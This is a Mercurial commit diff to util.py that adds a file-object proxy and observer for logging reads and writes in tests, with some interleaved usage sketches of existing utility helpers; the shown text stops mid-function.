util: add a file object proxy that can notify observers...
Gregory Szorc
r36541:bfe38f78 default
@@ -1,4013 +1,4235 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import io
30 30 import itertools
31 31 import mmap
32 32 import os
33 33 import platform as pyplatform
34 34 import re as remod
35 35 import shutil
36 36 import signal
37 37 import socket
38 38 import stat
39 39 import string
40 40 import subprocess
41 41 import sys
42 42 import tempfile
43 43 import textwrap
44 44 import time
45 45 import traceback
46 46 import warnings
47 47 import zlib
48 48
49 49 from . import (
50 50 encoding,
51 51 error,
52 52 i18n,
53 53 node as nodemod,
54 54 policy,
55 55 pycompat,
56 56 urllibcompat,
57 57 )
58 58
59 59 base85 = policy.importmod(r'base85')
60 60 osutil = policy.importmod(r'osutil')
61 61 parsers = policy.importmod(r'parsers')
62 62
63 63 b85decode = base85.b85decode
64 64 b85encode = base85.b85encode
65 65
66 66 cookielib = pycompat.cookielib
67 67 empty = pycompat.empty
68 68 httplib = pycompat.httplib
69 69 pickle = pycompat.pickle
70 70 queue = pycompat.queue
71 71 socketserver = pycompat.socketserver
72 72 stderr = pycompat.stderr
73 73 stdin = pycompat.stdin
74 74 stdout = pycompat.stdout
75 75 stringio = pycompat.stringio
76 76 xmlrpclib = pycompat.xmlrpclib
77 77
78 78 httpserver = urllibcompat.httpserver
79 79 urlerr = urllibcompat.urlerr
80 80 urlreq = urllibcompat.urlreq
81 81
82 82 # workaround for win32mbcs
83 83 _filenamebytestr = pycompat.bytestr
84 84
85 85 def isatty(fp):
86 86 try:
87 87 return fp.isatty()
88 88 except AttributeError:
89 89 return False
90 90
91 91 # glibc determines buffering on the first write to stdout - if we replace a
92 92 # TTY-destined stdout with a pipe-destined stdout (e.g. a pager), we want line
93 93 # buffering
94 94 if isatty(stdout):
95 95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
96 96
97 97 if pycompat.iswindows:
98 98 from . import windows as platform
99 99 stdout = platform.winstdout(stdout)
100 100 else:
101 101 from . import posix as platform
102 102
103 103 _ = i18n._
104 104
105 105 bindunixsocket = platform.bindunixsocket
106 106 cachestat = platform.cachestat
107 107 checkexec = platform.checkexec
108 108 checklink = platform.checklink
109 109 copymode = platform.copymode
110 110 executablepath = platform.executablepath
111 111 expandglobs = platform.expandglobs
112 112 explainexit = platform.explainexit
113 113 findexe = platform.findexe
114 114 getfsmountpoint = platform.getfsmountpoint
115 115 getfstype = platform.getfstype
116 116 gethgcmd = platform.gethgcmd
117 117 getuser = platform.getuser
118 118 getpid = os.getpid
119 119 groupmembers = platform.groupmembers
120 120 groupname = platform.groupname
121 121 hidewindow = platform.hidewindow
122 122 isexec = platform.isexec
123 123 isowner = platform.isowner
124 124 listdir = osutil.listdir
125 125 localpath = platform.localpath
126 126 lookupreg = platform.lookupreg
127 127 makedir = platform.makedir
128 128 nlinks = platform.nlinks
129 129 normpath = platform.normpath
130 130 normcase = platform.normcase
131 131 normcasespec = platform.normcasespec
132 132 normcasefallback = platform.normcasefallback
133 133 openhardlinks = platform.openhardlinks
134 134 oslink = platform.oslink
135 135 parsepatchoutput = platform.parsepatchoutput
136 136 pconvert = platform.pconvert
137 137 poll = platform.poll
138 138 popen = platform.popen
139 139 posixfile = platform.posixfile
140 140 quotecommand = platform.quotecommand
141 141 readpipe = platform.readpipe
142 142 rename = platform.rename
143 143 removedirs = platform.removedirs
144 144 samedevice = platform.samedevice
145 145 samefile = platform.samefile
146 146 samestat = platform.samestat
147 147 setbinary = platform.setbinary
148 148 setflags = platform.setflags
149 149 setsignalhandler = platform.setsignalhandler
150 150 shellquote = platform.shellquote
151 151 shellsplit = platform.shellsplit
152 152 spawndetached = platform.spawndetached
153 153 split = platform.split
154 154 sshargs = platform.sshargs
155 155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 156 statisexec = platform.statisexec
157 157 statislink = platform.statislink
158 158 testpid = platform.testpid
159 159 umask = platform.umask
160 160 unlink = platform.unlink
161 161 username = platform.username
162 162
163 163 try:
164 164 recvfds = osutil.recvfds
165 165 except AttributeError:
166 166 pass
167 167 try:
168 168 setprocname = osutil.setprocname
169 169 except AttributeError:
170 170 pass
171 171 try:
172 172 unblocksignal = osutil.unblocksignal
173 173 except AttributeError:
174 174 pass
175 175
176 176 # Python compatibility
177 177
178 178 _notset = object()
179 179
180 180 # disable Python's problematic floating point timestamps (issue4836)
181 181 # (Python hypocritically says you shouldn't change this behavior in
182 182 # libraries, and sure enough Mercurial is not a library.)
183 183 os.stat_float_times(False)
184 184
185 185 def safehasattr(thing, attr):
186 186 return getattr(thing, attr, _notset) is not _notset
187 187
188 188 def _rapply(f, xs):
189 189 if xs is None:
190 190 # assume None means non-value of optional data
191 191 return xs
192 192 if isinstance(xs, (list, set, tuple)):
193 193 return type(xs)(_rapply(f, x) for x in xs)
194 194 if isinstance(xs, dict):
195 195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
196 196 return f(xs)
197 197
198 198 def rapply(f, xs):
199 199 """Apply function recursively to every item preserving the data structure
200 200
201 201 >>> def f(x):
202 202 ... return 'f(%s)' % x
203 203 >>> rapply(f, None) is None
204 204 True
205 205 >>> rapply(f, 'a')
206 206 'f(a)'
207 207 >>> rapply(f, {'a'}) == {'f(a)'}
208 208 True
209 209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
210 210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
211 211
212 212 >>> xs = [object()]
213 213 >>> rapply(pycompat.identity, xs) is xs
214 214 True
215 215 """
216 216 if f is pycompat.identity:
217 217 # fast path mainly for py2
218 218 return xs
219 219 return _rapply(f, xs)
220 220
221 221 def bytesinput(fin, fout, *args, **kwargs):
222 222 sin, sout = sys.stdin, sys.stdout
223 223 try:
224 224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
225 225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
226 226 finally:
227 227 sys.stdin, sys.stdout = sin, sout
228 228
229 229 def bitsfrom(container):
230 230 bits = 0
231 231 for bit in container:
232 232 bits |= bit
233 233 return bits
234 234
235 235 # Python 2.6 still has deprecation warnings enabled by default. We do not want
236 236 # to display anything to ordinary users, so detect whether we are running tests
237 237 # and only use Python deprecation warnings in that case.
238 238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
239 239 if _dowarn:
240 240 # explicitly unfilter our warning for python 2.7
241 241 #
242 242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
243 243 # However, a module name set through PYTHONWARNINGS is matched exactly, so
244 244 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
245 245 # makes the whole PYTHONWARNINGS approach useless for our use case.
246 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
247 247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
248 248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
249 249
250 250 def nouideprecwarn(msg, version, stacklevel=1):
251 251 """Issue an python native deprecation warning
252 252
253 253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
254 254 """
255 255 if _dowarn:
256 256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
257 257 " update your code.)") % version
258 258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
259 259
260 260 DIGESTS = {
261 261 'md5': hashlib.md5,
262 262 'sha1': hashlib.sha1,
263 263 'sha512': hashlib.sha512,
264 264 }
265 265 # List of digest types from strongest to weakest
266 266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
267 267
268 268 for k in DIGESTS_BY_STRENGTH:
269 269 assert k in DIGESTS
270 270
271 271 class digester(object):
272 272 """helper to compute digests.
273 273
274 274 This helper can be used to compute one or more digests given their name.
275 275
276 276 >>> d = digester([b'md5', b'sha1'])
277 277 >>> d.update(b'foo')
278 278 >>> [k for k in sorted(d)]
279 279 ['md5', 'sha1']
280 280 >>> d[b'md5']
281 281 'acbd18db4cc2f85cedef654fccc4a4d8'
282 282 >>> d[b'sha1']
283 283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
284 284 >>> digester.preferred([b'md5', b'sha1'])
285 285 'sha1'
286 286 """
287 287
288 288 def __init__(self, digests, s=''):
289 289 self._hashes = {}
290 290 for k in digests:
291 291 if k not in DIGESTS:
292 292 raise Abort(_('unknown digest type: %s') % k)
293 293 self._hashes[k] = DIGESTS[k]()
294 294 if s:
295 295 self.update(s)
296 296
297 297 def update(self, data):
298 298 for h in self._hashes.values():
299 299 h.update(data)
300 300
301 301 def __getitem__(self, key):
302 302 if key not in DIGESTS:
303 303 raise Abort(_('unknown digest type: %s') % key)
304 304 return nodemod.hex(self._hashes[key].digest())
305 305
306 306 def __iter__(self):
307 307 return iter(self._hashes)
308 308
309 309 @staticmethod
310 310 def preferred(supported):
311 311 """returns the strongest digest type in both supported and DIGESTS."""
312 312
313 313 for k in DIGESTS_BY_STRENGTH:
314 314 if k in supported:
315 315 return k
316 316 return None
317 317
318 318 class digestchecker(object):
319 319 """file handle wrapper that additionally checks content against a given
320 320 size and digests.
321 321
322 322 d = digestchecker(fh, size, {'md5': '...'})
323 323
324 324 When multiple digests are given, all of them are validated.
325 325 """
326 326
327 327 def __init__(self, fh, size, digests):
328 328 self._fh = fh
329 329 self._size = size
330 330 self._got = 0
331 331 self._digests = dict(digests)
332 332 self._digester = digester(self._digests.keys())
333 333
334 334 def read(self, length=-1):
335 335 content = self._fh.read(length)
336 336 self._digester.update(content)
337 337 self._got += len(content)
338 338 return content
339 339
340 340 def validate(self):
341 341 if self._size != self._got:
342 342 raise Abort(_('size mismatch: expected %d, got %d') %
343 343 (self._size, self._got))
344 344 for k, v in self._digests.items():
345 345 if v != self._digester[k]:
346 346 # i18n: first parameter is a digest name
347 347 raise Abort(_('%s mismatch: expected %s, got %s') %
348 348 (k, v, self._digester[k]))
349 349
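For illustration, here is a minimal usage sketch of digestchecker: the payload and digest are invented for the example, and this module's py2-era bytes handling is assumed.

```python
import hashlib
import io

payload = b'foo'
fh = io.BytesIO(payload)
checker = digestchecker(fh, len(payload),
                        {'md5': hashlib.md5(payload).hexdigest()})
while checker.read(4096):
    pass              # consume the stream through the checking wrapper
checker.validate()    # raises Abort on a size or digest mismatch
```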
350 350 try:
351 351 buffer = buffer
352 352 except NameError:
353 353 def buffer(sliceable, offset=0, length=None):
354 354 if length is not None:
355 355 return memoryview(sliceable)[offset:offset + length]
356 356 return memoryview(sliceable)[offset:]
357 357
358 358 closefds = pycompat.isposix
359 359
360 360 _chunksize = 4096
361 361
362 362 class bufferedinputpipe(object):
363 363 """a manually buffered input pipe
364 364
365 365 Python will not let us use buffered IO and lazy reading with 'polling' at
366 366 the same time. We cannot probe the buffer state and select will not detect
367 367 that data is ready to read if it is already buffered.
368 368
369 369 This class lets us work around that by implementing its own buffering
370 370 (allowing efficient readline) while offering a way to know if the buffer is
371 371 empty from the outside (allowing the buffer to collaborate with polling).
372 372
373 373 This class lives in the 'util' module because it makes use of the 'os'
374 374 module from the python stdlib.
375 375 """
376 376
377 377 def __init__(self, input):
378 378 self._input = input
379 379 self._buffer = []
380 380 self._eof = False
381 381 self._lenbuf = 0
382 382
383 383 @property
384 384 def hasbuffer(self):
385 385 """True is any data is currently buffered
386 386
387 387 This will be used externally a pre-step for polling IO. If there is
388 388 already data then no polling should be set in place."""
389 389 return bool(self._buffer)
390 390
391 391 @property
392 392 def closed(self):
393 393 return self._input.closed
394 394
395 395 def fileno(self):
396 396 return self._input.fileno()
397 397
398 398 def close(self):
399 399 return self._input.close()
400 400
401 401 def read(self, size):
402 402 while (not self._eof) and (self._lenbuf < size):
403 403 self._fillbuffer()
404 404 return self._frombuffer(size)
405 405
406 406 def readline(self, *args, **kwargs):
407 407 if 1 < len(self._buffer):
408 408 # this should not happen because both read and readline end with a
409 409 # _frombuffer call that collapses the buffer.
410 410 self._buffer = [''.join(self._buffer)]
411 411 self._lenbuf = len(self._buffer[0])
412 412 lfi = -1
413 413 if self._buffer:
414 414 lfi = self._buffer[-1].find('\n')
415 415 while (not self._eof) and lfi < 0:
416 416 self._fillbuffer()
417 417 if self._buffer:
418 418 lfi = self._buffer[-1].find('\n')
419 419 size = lfi + 1
420 420 if lfi < 0: # end of file
421 421 size = self._lenbuf
422 422 elif 1 < len(self._buffer):
423 423 # we need to take previous chunks into account
424 424 size += self._lenbuf - len(self._buffer[-1])
425 425 return self._frombuffer(size)
426 426
427 427 def _frombuffer(self, size):
428 428 """return at most 'size' data from the buffer
429 429
430 430 The data are removed from the buffer."""
431 431 if size == 0 or not self._buffer:
432 432 return ''
433 433 buf = self._buffer[0]
434 434 if 1 < len(self._buffer):
435 435 buf = ''.join(self._buffer)
436 436
437 437 data = buf[:size]
438 438 buf = buf[len(data):]
439 439 if buf:
440 440 self._buffer = [buf]
441 441 self._lenbuf = len(buf)
442 442 else:
443 443 self._buffer = []
444 444 self._lenbuf = 0
445 445 return data
446 446
447 447 def _fillbuffer(self):
448 448 """read data to the buffer"""
449 449 data = os.read(self._input.fileno(), _chunksize)
450 450 if not data:
451 451 self._eof = True
452 452 else:
453 453 self._lenbuf += len(data)
454 454 self._buffer.append(data)
455 455
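A minimal sketch of the buffer/polling collaboration the docstring describes, assuming a POSIX environment; the subprocess and loop are illustrative, not from the original source.

```python
import select
import subprocess

proc = subprocess.Popen([b'cat'], stdin=subprocess.PIPE,
                        stdout=subprocess.PIPE)
pipe = bufferedinputpipe(proc.stdout)
proc.stdin.write(b'one\ntwo\n')
proc.stdin.close()

while True:
    if not pipe.hasbuffer:
        # Only block in select() when nothing is already buffered.
        select.select([pipe], [], [])
    line = pipe.readline()
    if not line:
        break
```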
456 456 def mmapread(fp):
457 457 try:
458 458 fd = getattr(fp, 'fileno', lambda: fp)()
459 459 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
460 460 except ValueError:
461 461 # Empty files cannot be mmapped, but mmapread should still work. Check
462 462 # if the file is empty, and if so, return an empty buffer.
463 463 if os.fstat(fd).st_size == 0:
464 464 return ''
465 465 raise
466 466
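A short usage sketch (the path is illustrative); the ValueError branch above is what makes an empty file yield an empty buffer instead of raising.

```python
with open('/tmp/example.bin', 'rb') as fp:
    data = mmapread(fp)   # mmap object, or '' for an empty file
    header = data[:4]     # sliceable like a bytestring
```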
467 467 def popen2(cmd, env=None, newlines=False):
468 468 # Setting bufsize to -1 lets the system decide the buffer size.
469 469 # The default for bufsize is 0, meaning unbuffered. This leads to
470 470 # poor performance on Mac OS X: http://bugs.python.org/issue4194
471 471 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
472 472 close_fds=closefds,
473 473 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
474 474 universal_newlines=newlines,
475 475 env=env)
476 476 return p.stdin, p.stdout
477 477
478 478 def popen3(cmd, env=None, newlines=False):
479 479 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
480 480 return stdin, stdout, stderr
481 481
482 482 def popen4(cmd, env=None, newlines=False, bufsize=-1):
483 483 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
484 484 close_fds=closefds,
485 485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
486 486 stderr=subprocess.PIPE,
487 487 universal_newlines=newlines,
488 488 env=env)
489 489 return p.stdin, p.stdout, p.stderr, p
490 490
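An illustrative round trip through popen2, assuming a POSIX shell with `rev` available:

```python
stdin, stdout = popen2(b'rev')
stdin.write(b'hello\n')
stdin.close()
out = stdout.read()   # b'olleh\n'
```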
491 class fileobjectproxy(object):
492 """A proxy around file objects that tells a watcher when events occur.
493
494 This type is intended to only be used for testing purposes. Think hard
495 before using it in important code.
496 """
497 __slots__ = (
498 r'_orig',
499 r'_observer',
500 )
501
502 def __init__(self, fh, observer):
503 object.__setattr__(self, '_orig', fh)
504 object.__setattr__(self, '_observer', observer)
505
506 def __getattribute__(self, name):
507 ours = {
508 # IOBase
509 r'close',
510 # closed is a property
511 r'fileno',
512 r'flush',
513 r'isatty',
514 r'readable',
515 r'readline',
516 r'readlines',
517 r'seek',
518 r'seekable',
519 r'tell',
520 r'truncate',
521 r'writable',
522 r'writelines',
523 # RawIOBase
524 r'read',
525 r'readall',
526 r'readinto',
527 r'write',
528 # BufferedIOBase
529 # raw is a property
530 r'detach',
531 # read defined above
532 r'read1',
533 # readinto defined above
534 # write defined above
535 }
536
537 # We only observe some methods.
538 if name in ours:
539 return object.__getattribute__(self, name)
540
541 return getattr(object.__getattribute__(self, r'_orig'), name)
542
543 def __delattr__(self, name):
544 return delattr(object.__getattribute__(self, r'_orig'), name)
545
546 def __setattr__(self, name, value):
547 return setattr(object.__getattribute__(self, r'_orig'), name, value)
548
549 def __iter__(self):
550 return object.__getattribute__(self, r'_orig').__iter__()
551
552 def _observedcall(self, name, *args, **kwargs):
553 # Call the original object.
554 orig = object.__getattribute__(self, r'_orig')
555 res = getattr(orig, name)(*args, **kwargs)
556
557 # Call a method on the observer of the same name with arguments
558 # so it can react, log, etc.
559 observer = object.__getattribute__(self, r'_observer')
560 fn = getattr(observer, name, None)
561 if fn:
562 fn(res, *args, **kwargs)
563
564 return res
565
566 def close(self, *args, **kwargs):
567 return object.__getattribute__(self, r'_observedcall')(
568 r'close', *args, **kwargs)
569
570 def fileno(self, *args, **kwargs):
571 return object.__getattribute__(self, r'_observedcall')(
572 r'fileno', *args, **kwargs)
573
574 def flush(self, *args, **kwargs):
575 return object.__getattribute__(self, r'_observedcall')(
576 r'flush', *args, **kwargs)
577
578 def isatty(self, *args, **kwargs):
579 return object.__getattribute__(self, r'_observedcall')(
580 r'isatty', *args, **kwargs)
581
582 def readable(self, *args, **kwargs):
583 return object.__getattribute__(self, r'_observedcall')(
584 r'readable', *args, **kwargs)
585
586 def readline(self, *args, **kwargs):
587 return object.__getattribute__(self, r'_observedcall')(
588 r'readline', *args, **kwargs)
589
590 def readlines(self, *args, **kwargs):
591 return object.__getattribute__(self, r'_observedcall')(
592 r'readlines', *args, **kwargs)
593
594 def seek(self, *args, **kwargs):
595 return object.__getattribute__(self, r'_observedcall')(
596 r'seek', *args, **kwargs)
597
598 def seekable(self, *args, **kwargs):
599 return object.__getattribute__(self, r'_observedcall')(
600 r'seekable', *args, **kwargs)
601
602 def tell(self, *args, **kwargs):
603 return object.__getattribute__(self, r'_observedcall')(
604 r'tell', *args, **kwargs)
605
606 def truncate(self, *args, **kwargs):
607 return object.__getattribute__(self, r'_observedcall')(
608 r'truncate', *args, **kwargs)
609
610 def writable(self, *args, **kwargs):
611 return object.__getattribute__(self, r'_observedcall')(
612 r'writable', *args, **kwargs)
613
614 def writelines(self, *args, **kwargs):
615 return object.__getattribute__(self, r'_observedcall')(
616 r'writelines', *args, **kwargs)
617
618 def read(self, *args, **kwargs):
619 return object.__getattribute__(self, r'_observedcall')(
620 r'read', *args, **kwargs)
621
622 def readall(self, *args, **kwargs):
623 return object.__getattribute__(self, r'_observedcall')(
624 r'readall', *args, **kwargs)
625
626 def readinto(self, *args, **kwargs):
627 return object.__getattribute__(self, r'_observedcall')(
628 r'readinto', *args, **kwargs)
629
630 def write(self, *args, **kwargs):
631 return object.__getattribute__(self, r'_observedcall')(
632 r'write', *args, **kwargs)
633
634 def detach(self, *args, **kwargs):
635 return object.__getattribute__(self, r'_observedcall')(
636 r'detach', *args, **kwargs)
637
638 def read1(self, *args, **kwargs):
639 return object.__getattribute__(self, r'_observedcall')(
640 r'read1', *args, **kwargs)
641
642 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
643 DATA_ESCAPE_MAP.update({
644 b'\\': b'\\\\',
645 b'\r': br'\r',
646 b'\n': br'\n',
647 })
648 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
649
650 def escapedata(s):
651 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
652
653 class fileobjectobserver(object):
654 """Logs file object activity."""
655 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
656 self.fh = fh
657 self.name = name
658 self.logdata = logdata
659 self.reads = reads
660 self.writes = writes
661
662 def _writedata(self, data):
663 if not self.logdata:
664 self.fh.write('\n')
665 return
666
667 # Simple case writes all data on a single line.
668 if b'\n' not in data:
669 self.fh.write(': %s\n' % escapedata(data))
670 return
671
672 # Data with newlines is written to multiple lines.
673 self.fh.write(':\n')
674 lines = data.splitlines(True)
675 for line in lines:
676 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
677
678 def read(self, res, size=-1):
679 if not self.reads:
680 return
681
682 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
683 self._writedata(res)
684
685 def readline(self, res, limit=-1):
686 if not self.reads:
687 return
688
689 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
690 self._writedata(res)
691
692 def write(self, res, data):
693 if not self.writes:
694 return
695
696 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
697 self._writedata(data)
698
699 def flush(self, res):
700 if not self.writes:
701 return
702
703 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
704
705 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
706 logdata=False):
707 """Turn a file object into a logging file object."""
708
709 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
710 logdata=logdata)
711 return fileobjectproxy(fh, observer)
712
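To make the new proxy concrete, here is an illustrative use of makeloggingfileobject; the name b'clientio' and the BytesIO handles are invented for the example.

```python
import io

logh = io.BytesIO()
fh = makeloggingfileobject(logh, io.BytesIO(), b'clientio', logdata=True)
fh.write(b'ping')      # observed: logs the byte count, result, and data
fh.seek(0)             # forwarded to the original object, but not logged
fh.read(4)             # observed: logs the read() call and returned data
log = logh.getvalue()  # lines like "clientio> write(4) -> 4: ping"
```

Only methods listed in the `ours` set above are intercepted; everything else (seek() here, since the observer defines no seek handler) passes through to the wrapped object silently.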
491 713 def version():
492 714 """Return version information if available."""
493 715 try:
494 716 from . import __version__
495 717 return __version__.version
496 718 except ImportError:
497 719 return 'unknown'
498 720
499 721 def versiontuple(v=None, n=4):
500 722 """Parses a Mercurial version string into an N-tuple.
501 723
502 724 The version string to be parsed is specified with the ``v`` argument.
503 725 If it isn't defined, the current Mercurial version string will be parsed.
504 726
505 727 ``n`` can be 2, 3, or 4. Here is how some version strings map to
506 728 returned values:
507 729
508 730 >>> v = b'3.6.1+190-df9b73d2d444'
509 731 >>> versiontuple(v, 2)
510 732 (3, 6)
511 733 >>> versiontuple(v, 3)
512 734 (3, 6, 1)
513 735 >>> versiontuple(v, 4)
514 736 (3, 6, 1, '190-df9b73d2d444')
515 737
516 738 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
517 739 (3, 6, 1, '190-df9b73d2d444+20151118')
518 740
519 741 >>> v = b'3.6'
520 742 >>> versiontuple(v, 2)
521 743 (3, 6)
522 744 >>> versiontuple(v, 3)
523 745 (3, 6, None)
524 746 >>> versiontuple(v, 4)
525 747 (3, 6, None, None)
526 748
527 749 >>> v = b'3.9-rc'
528 750 >>> versiontuple(v, 2)
529 751 (3, 9)
530 752 >>> versiontuple(v, 3)
531 753 (3, 9, None)
532 754 >>> versiontuple(v, 4)
533 755 (3, 9, None, 'rc')
534 756
535 757 >>> v = b'3.9-rc+2-02a8fea4289b'
536 758 >>> versiontuple(v, 2)
537 759 (3, 9)
538 760 >>> versiontuple(v, 3)
539 761 (3, 9, None)
540 762 >>> versiontuple(v, 4)
541 763 (3, 9, None, 'rc+2-02a8fea4289b')
542 764 """
543 765 if not v:
544 766 v = version()
545 767 parts = remod.split('[\+-]', v, 1)
546 768 if len(parts) == 1:
547 769 vparts, extra = parts[0], None
548 770 else:
549 771 vparts, extra = parts
550 772
551 773 vints = []
552 774 for i in vparts.split('.'):
553 775 try:
554 776 vints.append(int(i))
555 777 except ValueError:
556 778 break
557 779 # (3, 6) -> (3, 6, None)
558 780 while len(vints) < 3:
559 781 vints.append(None)
560 782
561 783 if n == 2:
562 784 return (vints[0], vints[1])
563 785 if n == 3:
564 786 return (vints[0], vints[1], vints[2])
565 787 if n == 4:
566 788 return (vints[0], vints[1], vints[2], extra)
567 789
568 790 # used by parsedate
569 791 defaultdateformats = (
570 792 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
571 793 '%Y-%m-%dT%H:%M', # without seconds
572 794 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
573 795 '%Y-%m-%dT%H%M', # without seconds
574 796 '%Y-%m-%d %H:%M:%S', # our common legal variant
575 797 '%Y-%m-%d %H:%M', # without seconds
576 798 '%Y-%m-%d %H%M%S', # without :
577 799 '%Y-%m-%d %H%M', # without seconds
578 800 '%Y-%m-%d %I:%M:%S%p',
579 801 '%Y-%m-%d %H:%M',
580 802 '%Y-%m-%d %I:%M%p',
581 803 '%Y-%m-%d',
582 804 '%m-%d',
583 805 '%m/%d',
584 806 '%m/%d/%y',
585 807 '%m/%d/%Y',
586 808 '%a %b %d %H:%M:%S %Y',
587 809 '%a %b %d %I:%M:%S%p %Y',
588 810 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
589 811 '%b %d %H:%M:%S %Y',
590 812 '%b %d %I:%M:%S%p %Y',
591 813 '%b %d %H:%M:%S',
592 814 '%b %d %I:%M:%S%p',
593 815 '%b %d %H:%M',
594 816 '%b %d %I:%M%p',
595 817 '%b %d %Y',
596 818 '%b %d',
597 819 '%H:%M:%S',
598 820 '%I:%M:%S%p',
599 821 '%H:%M',
600 822 '%I:%M%p',
601 823 )
602 824
603 825 extendeddateformats = defaultdateformats + (
604 826 "%Y",
605 827 "%Y-%m",
606 828 "%b",
607 829 "%b %Y",
608 830 )
609 831
610 832 def cachefunc(func):
611 833 '''cache the result of function calls'''
612 834 # XXX doesn't handle keyword args
613 835 if func.__code__.co_argcount == 0:
614 836 cache = []
615 837 def f():
616 838 if len(cache) == 0:
617 839 cache.append(func())
618 840 return cache[0]
619 841 return f
620 842 cache = {}
621 843 if func.__code__.co_argcount == 1:
622 844 # we gain a small amount of time because
623 845 # we don't need to pack/unpack the list
624 846 def f(arg):
625 847 if arg not in cache:
626 848 cache[arg] = func(arg)
627 849 return cache[arg]
628 850 else:
629 851 def f(*args):
630 852 if args not in cache:
631 853 cache[args] = func(*args)
632 854 return cache[args]
633 855
634 856 return f
635 857
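A minimal illustration of the single-argument fast path (the function name is hypothetical):

```python
calls = []

@cachefunc
def square(x):
    calls.append(x)
    return x * x

square(3)
square(3)
assert calls == [3]   # the second call was served from the cache
```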
636 858 class cow(object):
637 859 """helper class to make copy-on-write easier
638 860
639 861 Call preparewrite before doing any writes.
640 862 """
641 863
642 864 def preparewrite(self):
643 865 """call this before writes, return self or a copied new object"""
644 866 if getattr(self, '_copied', 0):
645 867 self._copied -= 1
646 868 return self.__class__(self)
647 869 return self
648 870
649 871 def copy(self):
650 872 """always do a cheap copy"""
651 873 self._copied = getattr(self, '_copied', 0) + 1
652 874 return self
653 875
654 876 class sortdict(collections.OrderedDict):
655 877 '''a simple sorted dictionary
656 878
657 879 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
658 880 >>> d2 = d1.copy()
659 881 >>> d2
660 882 sortdict([('a', 0), ('b', 1)])
661 883 >>> d2.update([(b'a', 2)])
662 884 >>> list(d2.keys()) # should still be in last-set order
663 885 ['b', 'a']
664 886 '''
665 887
666 888 def __setitem__(self, key, value):
667 889 if key in self:
668 890 del self[key]
669 891 super(sortdict, self).__setitem__(key, value)
670 892
671 893 if pycompat.ispypy:
672 894 # __setitem__() isn't called as of PyPy 5.8.0
673 895 def update(self, src):
674 896 if isinstance(src, dict):
675 897 src = src.iteritems()
676 898 for k, v in src:
677 899 self[k] = v
678 900
679 901 class cowdict(cow, dict):
680 902 """copy-on-write dict
681 903
682 904 Be sure to call d = d.preparewrite() before writing to d.
683 905
684 906 >>> a = cowdict()
685 907 >>> a is a.preparewrite()
686 908 True
687 909 >>> b = a.copy()
688 910 >>> b is a
689 911 True
690 912 >>> c = b.copy()
691 913 >>> c is a
692 914 True
693 915 >>> a = a.preparewrite()
694 916 >>> b is a
695 917 False
696 918 >>> a is a.preparewrite()
697 919 True
698 920 >>> c = c.preparewrite()
699 921 >>> b is c
700 922 False
701 923 >>> b is b.preparewrite()
702 924 True
703 925 """
704 926
705 927 class cowsortdict(cow, sortdict):
706 928 """copy-on-write sortdict
707 929
708 930 Be sure to call d = d.preparewrite() before writing to d.
709 931 """
710 932
711 933 class transactional(object):
712 934 """Base class for making a transactional type into a context manager."""
713 935 __metaclass__ = abc.ABCMeta
714 936
715 937 @abc.abstractmethod
716 938 def close(self):
717 939 """Successfully closes the transaction."""
718 940
719 941 @abc.abstractmethod
720 942 def release(self):
721 943 """Marks the end of the transaction.
722 944
723 945 If the transaction has not been closed, it will be aborted.
724 946 """
725 947
726 948 def __enter__(self):
727 949 return self
728 950
729 951 def __exit__(self, exc_type, exc_val, exc_tb):
730 952 try:
